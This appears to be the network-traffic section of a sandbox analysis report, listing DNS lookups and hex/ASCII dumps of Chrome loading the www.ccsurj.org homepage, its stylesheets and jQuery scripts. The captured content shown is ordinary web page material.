                                          Jan 12, 2025 01:17:22.406164885 CET1.1.1.1192.168.2.40xab1No error (0)p3yw7u.innittapp.com.download.ks-cdn.coml5-global.gslb.ksyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:17:22.675729990 CET1.1.1.1192.168.2.40x288dNo error (0)p3yw7u.innittapp.comp3yw7u.innittapp.com.download.ks-cdn.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:17:22.675729990 CET1.1.1.1192.168.2.40x288dNo error (0)p3yw7u.innittapp.com.download.ks-cdn.coml5-global.gslb.ksyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:17:22.824340105 CET1.1.1.1192.168.2.40x9773No error (0)551000l.cc154.193.113.233A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:22.824340105 CET1.1.1.1192.168.2.40x9773No error (0)551000l.cc154.193.113.232A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:25.857404947 CET1.1.1.1192.168.2.40xba29No error (0)p3yw7u.innittapp.comp3yw7u.innittapp.com.download.ks-cdn.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:17:25.857404947 CET1.1.1.1192.168.2.40xba29No error (0)p3yw7u.innittapp.com.download.ks-cdn.coml5-global.gslb.ksyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:17:25.857404947 CET1.1.1.1192.168.2.40xba29No error (0)l5-global.gslb.ksyuncdn.com103.198.200.7A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:25.857404947 CET1.1.1.1192.168.2.40xba29No error (0)l5-global.gslb.ksyuncdn.com103.155.16.134A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:26.253835917 CET1.1.1.1192.168.2.40x39b7No error (0)p3yw7u.innittapp.comp3yw7u.innittapp.com.download.ks-cdn.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:17:26.253835917 CET1.1.1.1192.168.2.40x39b7No error (0)p3yw7u.innittapp.com.download.ks-cdn.coml5-global.gslb.ksyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.449739154.216.143.26805436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 12, 2025 01:16:51.865066051 CET427OUTGET / HTTP/1.1
                                          Host: m.ccsurj.org
                                          Connection: keep-alive
                                          Upgrade-Insecure-Requests: 1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Encoding: gzip, deflate
                                          Accept-Language: en-US,en;q=0.9
                                          Jan 12, 2025 01:16:52.758198023 CET353INHTTP/1.1 301 Moved Permanently
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:52 GMT
                                          Content-Type: text/html
                                          Content-Length: 162
                                          Connection: keep-alive
                                          Location: https://www.ccsurj.org/
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                          Jan 12, 2025 01:17:37.766144991 CET6OUTData Raw: 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.449740154.216.143.26805436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 12, 2025 01:17:36.874026060 CET6OUTData Raw: 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.449742154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:54 UTC657OUTGET / HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          Upgrade-Insecure-Requests: 1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: navigate
                                          Sec-Fetch-User: ?1
                                          Sec-Fetch-Dest: document
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          sec-ch-ua-platform: "Windows"
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:55 UTC267INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:54 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Content-Length: 25442
                                          Last-Modified: Fri, 10 Jan 2025 07:04:19 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c673-6362"
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:55 UTC16117INData Raw: ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 56 5f 50 41 54 48 3d 22 2f 22 3b 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 20 72 65 74 75 72 6e 20 74 72 75 65 3b 20 7d 3b 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 6e 61
                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><script>var V_PATH="/";window.onerror=function(){ return true; };</script><meta na
                                          2025-01-12 00:16:55 UTC9325INData Raw: 22 3e 3c 2f 73 70 61 6e 3e 3c 68 32 3e e5 b0 b1 e4 b8 9a e5 b7 a5 e4 bd 9c 3c 2f 68 32 3e 3c 61 20 68 72 65 66 3d 22 2f 6a 79 67 7a 2e 68 74 6d 6c 22 3e e6 9b b4 e5 a4 9a 26 67 74 3b 26 67 74 3b 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 2d 6c 69 73 74 32 20 69 2d 6c 62 6f 78 32 22 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 66 6f 2f 31 30 37 37 2f 33 34 35 39 2e 68 74 6d 6c 22 3e e6 9a 96 e5 bf 83 ef bc 81 e8 bf 99 e4 ba 9b e9 92 88 e5 af b9 e6 80 a7 e4 b8 be e6 8e aa e4 b8 ba e5 9b b0 e9 9a be e4 ba ba e5 91 98 e5 b0 b1 e4 b8 9a e4 bf 9d 3c 2f 61 3e 3c 73 70 61 6e 3e 31 31 2f 32 35 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 3c 61 20 68 72 65 66
                                          Data Ascii: "></span><h2></h2><a href="/jygz.html">&gt;&gt;</a></div> <div class="i-list2 i-lbox2"><ul><li><a href="/info/1077/3459.html"></a><span>11/25</span></li><li><a href


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.449743154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:55 UTC542OUTGET /style/style.css HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:55 UTC323INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:55 GMT
                                          Content-Type: text/css
                                          Content-Length: 15539
                                          Last-Modified: Fri, 10 Jan 2025 07:04:19 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c673-3cb3"
                                          Expires: Tue, 11 Feb 2025 00:16:55 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:55 UTC15539INData Raw: 40 63 68 61 72 73 65 74 20 22 75 74 66 2d 38 22 3b 2f 2a 20 43 53 53 20 44 6f 63 75 6d 65 6e 74 2a 2f 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 20 30 3b 70 61 64 64 69 6e 67 3a 20 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 6d 69 63 72 6f 73 6f 66 74 20 79 61 68 65 69 22 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 20 31 31 30 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 66 66 66 3b 7d 0d 0a 75 6c 2c 6c 69 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 20 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 20 30 3b 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0d 0a 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 6d 61 72 67 69 6e 3a 20 30 3b 70 61 64 64 69 6e 67 3a 20 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f
                                          Data Ascii: @charset "utf-8";/* CSS Document*/body{margin: 0;padding: 0;font-family: "microsoft yahei";font-size: 14px;min-width: 1100px;background:#ffffff;}ul,li{list-style-type: none;margin: 0;padding: 0;}h1,h2,h3,h4,h5,h6{margin: 0;padding: 0;font-weight: no


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.449744154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:56 UTC550OUTGET /sitegray/sitegray_d.css HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:56 UTC295INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:56 GMT
                                          Content-Type: text/css
                                          Content-Length: 20
                                          Last-Modified: Fri, 10 Jan 2025 07:04:20 GMT
                                          Connection: close
                                          ETag: "6780c674-14"
                                          Expires: Tue, 11 Feb 2025 00:16:56 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:56 UTC20INData Raw: 2f 2a 2e 6e 6f 67 72 61 79 66 6f 72 73 69 74 65 7b 7d 2a 2f
                                          Data Ascii: /*.nograyforsite{}*/


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.449747154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:56 UTC540OUTGET /index.vsb.css HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:56 UTC295INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:56 GMT
                                          Content-Type: text/css
                                          Content-Length: 34
                                          Last-Modified: Fri, 10 Jan 2025 07:04:20 GMT
                                          Connection: close
                                          ETag: "6780c674-22"
                                          Expires: Tue, 11 Feb 2025 00:16:56 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:56 UTC34INData Raw: 2e 66 6f 6e 74 32 37 30 38 36 36 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 70 74 20 3b 7d 0d 0a 0d 0a
                                          Data Ascii: .font270866{ font-size: 9pt ;}


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.449745154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:56 UTC525OUTGET /js/jquery.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:56 UTC353INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:56 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 94792
                                          Last-Modified: Fri, 10 Jan 2025 07:04:20 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c674-17248"
                                          Expires: Tue, 11 Feb 2025 00:16:56 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:56 UTC16031INData Raw: 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 75 6e 63 74 69 6f 6e 20 63 79 28 61 29 7b 72 65 74 75 72 6e 20 66 2e 69 73 57 69 6e 64 6f 77 28 61 29 3f 61 3a 61 2e 6e 6f 64 65 54 79 70 65 3d 3d 3d 39 3f 61 2e 64 65 66 61 75 6c 74 56 69 65 77 7c 7c 61 2e 70 61 72 65 6e 74 57 69 6e 64 6f 77 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 63 75 28 61 29 7b 69 66 28 21 63 6a 5b 61 5d 29 7b 76 61 72 20 62 3d 63 2e 62 6f 64 79 2c 64 3d 66 28 22 3c 22 2b 61 2b 22 3e 22 29 2e 61 70 70 65 6e 64 54 6f 28 62 29 2c 65 3d 64 2e 63 73 73 28 22 64 69 73 70 6c 61 79 22 29 3b 64 2e 72 65 6d 6f 76 65 28 29 3b 69 66 28 65 3d 3d 3d 22 6e 6f 6e 65 22 7c 7c 65 3d 3d 3d 22 22 29 7b 63 6b 7c 7c 28 63 6b 3d 63 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29
                                          Data Ascii: (function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe")
                                          2025-01-12 00:16:56 UTC16384INData Raw: 73 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 70 69 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 66 2e 44 65 66 65 72 72 65 64 28 66 75 6e 63 74 69 6f 6e 28 64 29 7b 66 2e 65 61 63 68 28 7b 64 6f 6e 65 3a 5b 61 2c 22 72 65 73 6f 6c 76 65 22 5d 2c 66 61 69 6c 3a 5b 62 2c 22 72 65 6a 65 63 74 22 5d 2c 70 72 6f 67 72 65 73 73 3a 5b 63 2c 22 6e 6f 74 69 66 79 22 5d 7d 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 5b 30 5d 2c 65 3d 62 5b 31 5d 2c 67 3b 66 2e 69 73 46 75 6e 63 74 69 6f 6e 28 63 29 3f 69 5b 61 5d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 3d 63 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 2c 67 26 26 66 2e 69 73 46 75 6e 63 74 69 6f 6e 28 67 2e 70 72 6f 6d 69 73 65 29 3f 67
                                          Data Ascii: s);return this},pipe:function(a,b,c){return f.Deferred(function(d){f.each({done:[a,"resolve"],fail:[b,"reject"],progress:[c,"notify"]},function(a,b){var c=b[0],e=b[1],g;f.isFunction(c)?i[a](function(){g=c.apply(this,arguments),g&&f.isFunction(g.promise)?g
                                          2025-01-12 00:16:57 UTC16384INData Raw: 0d 0a 61 29 7b 76 61 72 20 62 3d 46 2e 65 78 65 63 28 61 29 3b 62 26 26 28 62 5b 31 5d 3d 28 62 5b 31 5d 7c 7c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 62 5b 33 5d 3d 62 5b 33 5d 26 26 6e 65 77 20 52 65 67 45 78 70 28 22 28 3f 3a 5e 7c 5c 5c 73 29 22 2b 62 5b 33 5d 2b 22 28 3f 3a 5c 5c 73 7c 24 29 22 29 29 3b 72 65 74 75 72 6e 20 62 7d 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 7b 7d 3b 72 65 74 75 72 6e 28 21 62 5b 31 5d 7c 7c 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 5b 31 5d 29 26 26 28 21 62 5b 32 5d 7c 7c 28 63 2e 69 64 7c 7c 7b 7d 29 2e 76 61 6c 75 65 3d 3d 3d 62 5b 32 5d 29 26 26 28 21 62 5b 33 5d 7c 7c 62 5b 33 5d 2e 74 65 73
                                          Data Ascii: a){var b=F.exec(a);b&&(b[1]=(b[1]||"").toLowerCase(),b[3]=b[3]&&new RegExp("(?:^|\\s)"+b[3]+"(?:\\s|$)"));return b},H=function(a,b){var c=a.attributes||{};return(!b[1]||a.nodeName.toLowerCase()===b[1])&&(!b[2]||(c.id||{}).value===b[2])&&(!b[3]||b[3].tes
                                          2025-01-12 00:16:57 UTC16384INData Raw: 65 28 22 68 72 65 66 22 29 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 29 7d 7d 2c 72 65 6c 61 74 69 76 65 3a 7b 22 2b 22 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 74 79 70 65 6f 66 20 62 3d 3d 22 73 74 72 69 6e 67 22 2c 64 3d 63 26 26 21 6c 2e 74 65 73 74 28 62 29 2c 65 3d 63 26 26 21 64 3b 64 26 26 28 62 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 66 6f 72 28 76 61 72 20 66 3d 30 2c 67 3d 61 2e 6c 65 6e 67 74 68 2c 68 3b 66 3c 67 3b 66 2b 2b 29 69 66 28 68 3d 61 5b 66 5d 29 7b 77 68 69 6c 65 28 28 68 3d 68 2e 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 29 26 26 68 2e 6e 6f 64 65 54 79 70 65 21 3d 3d 31 29 3b 61 5b 66 5d 3d 65
                                          Data Ascii: e("href")},type:function(a){return a.getAttribute("type")}},relative:{"+":function(a,b){var c=typeof b=="string",d=c&&!l.test(b),e=c&&!d;d&&(b=b.toLowerCase());for(var f=0,g=a.length,h;f<g;f++)if(h=a[f]){while((h=h.previousSibling)&&h.nodeType!==1);a[f]=e
                                          2025-01-12 00:16:57 UTC16384INData Raw: 61 3d 66 0d 0a 2e 63 6c 65 61 6e 28 61 72 67 75 6d 65 6e 74 73 29 3b 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 74 68 69 73 2e 74 6f 41 72 72 61 79 28 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 61 2c 22 62 65 66 6f 72 65 22 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 61 66 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 5b 30 5d 26 26 74 68 69 73 5b 30 5d 2e 70 61 72 65 6e 74 4e 6f 64 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 64 6f 6d 4d 61 6e 69 70 28 61 72 67 75 6d 65 6e 74 73 2c 21 31 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 61 2c 74 68 69 73 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 7d 29 3b 69 66 28 61 72 67 75 6d 65 6e
                                          Data Ascii: a=f.clean(arguments);a.push.apply(a,this.toArray());return this.pushStack(a,"before",arguments)}},after:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,!1,function(a){this.parentNode.insertBefore(a,this.nextSibling)});if(argumen
                                          2025-01-12 00:16:57 UTC13225INData Raw: 63 6d 61 73 63 72 69 70 74 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 65 63 6d 61 73 63 72 69 70 74 22 7d 2c 63 6f 6e 74 65 6e 74 73 3a 7b 73 63 72 69 70 74 3a 2f 6a 61 76 61 73 63 72 69 70 74 7c 65 63 6d 61 73 63 72 69 70 74 2f 7d 2c 63 6f 6e 76 65 72 74 65 72 73 3a 7b 22 74 65 78 74 20 73 63 72 69 70 74 22 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 2e 67 6c 6f 62 61 6c 45 76 61 6c 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 7d 7d 29 2c 66 2e 61 6a 61 78 50 72 65 66 69 6c 74 65 72 28 22 73 63 72 69 70 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 63 61 63 68 65 3d 3d 3d 62 26 26 28 61 2e 63 61 63 68 65 3d 21 31 29 2c 61 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 26 26 28 61 2e 74 79 70 65 3d 22 47 45 54 22 2c 61 2e 67 6c 6f 62 61 6c 3d 21 31 29 7d 29 2c 66
                                          Data Ascii: cmascript, application/x-ecmascript"},contents:{script:/javascript|ecmascript/},converters:{"text script":function(a){f.globalEval(a);return a}}}),f.ajaxPrefilter("script",function(a){a.cache===b&&(a.cache=!1),a.crossDomain&&(a.type="GET",a.global=!1)}),f


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.449746154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:56 UTC536OUTGET /js/jquery.SuperSlide.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:56 UTC352INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:56 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 11020
                                          Last-Modified: Fri, 10 Jan 2025 07:04:19 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c673-2b0c"
                                          Expires: Tue, 11 Feb 2025 00:16:56 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:56 UTC11020INData Raw: ef bb bf 0d 0a 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 66 6e 2e 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 61 2e 66 6e 2e 73 6c 69 64 65 2e 64 65 66 61 75 6c 74 73 3d 7b 74 79 70 65 3a 22 73 6c 69 64 65 22 2c 65 66 66 65 63 74 3a 22 66 61 64 65 22 2c 61 75 74 6f 50 6c 61 79 3a 21 31 2c 64 65 6c 61 79 54 69 6d 65 3a 35 30 30 2c 69 6e 74 65 72 54 69 6d 65 3a 32 35 30 30 2c 74 72 69 67 67 65 72 54 69 6d 65 3a 31 35 30 2c 64 65 66 61 75 6c 74 49 6e 64 65 78 3a 30 2c 74 69 74 43 65 6c 6c 3a 22 2e 68 64 20 6c 69 22 2c 6d 61 69 6e 43 65 6c 6c 3a 22 2e 62 64 22 2c 74 61 72 67 65 74 43 65 6c 6c 3a 6e 75 6c 6c 2c 74 72 69 67 67 65 72 3a 22 6d 6f 75 73 65 6f 76 65 72 22 2c 73 63 72 6f 6c 6c 3a 31 2c 76 69 73 3a 31 2c 74 69
                                          Data Ascii: !function(a){a.fn.slide=function(b){return a.fn.slide.defaults={type:"slide",effect:"fade",autoPlay:!1,delayTime:500,interTime:2500,triggerTime:150,defaultIndex:0,titCell:".hd li",mainCell:".bd",targetCell:null,trigger:"mouseover",scroll:1,vis:1,ti


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.449748154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:56 UTC533OUTGET /sitegray/sitegray.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://www.ccsurj.org/
